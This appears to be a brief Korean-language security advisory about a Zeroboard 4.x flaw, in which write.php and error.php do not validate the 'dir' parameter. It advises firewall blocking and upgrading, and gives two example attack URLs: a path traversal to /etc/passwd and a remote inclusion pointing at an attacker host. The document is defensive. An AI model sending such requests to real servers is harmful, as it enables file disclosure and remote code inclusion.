해당 공격 시도는 Zeorboard의 "write.php" 와 "erroe.php" 파일이 "dir" 파라미터의 입력값에 대한 검증을 하지 않기 때문에 발생하는 Zeroboard 4.x 버전에 존재하는 취약성을 이용한 공격으로 해당 파라미터에 전달되는 자바 스크립트 이나 시스템내의 특정 명령어 입력, 시스템내의 특정 파일 이름 및 경로 지정, 특정 URL등을 입력하여 임의의 명령어를 실행 할수 있습니다.
해당 공격 시도에 대한 방어로는 밑의 예제와 같은 공격의 경우 즉시 방화벽 차단을 하여야 하며 해당 웹서버에 Zeroboard 를 사용중일 경우 최신 버전으로 교체를 해줘야 합니다.
예제
다중 File Disclosure 취약점
http://www.example.com/include/write.php?dir=../../../../../etc/passwd
다중원격 스크립트 삽입과 크로스사이트 스크립팅 취약점
http://www.example.com/include/write.php?dir=http://[attacker]/
(0) 
(0)
피곤 
